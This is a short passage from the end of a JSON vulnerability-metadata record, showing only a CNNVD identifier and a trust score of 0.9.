        "id": "CNNVD-200705-120"
      }
    ],
    "trust": 0.9
  }
}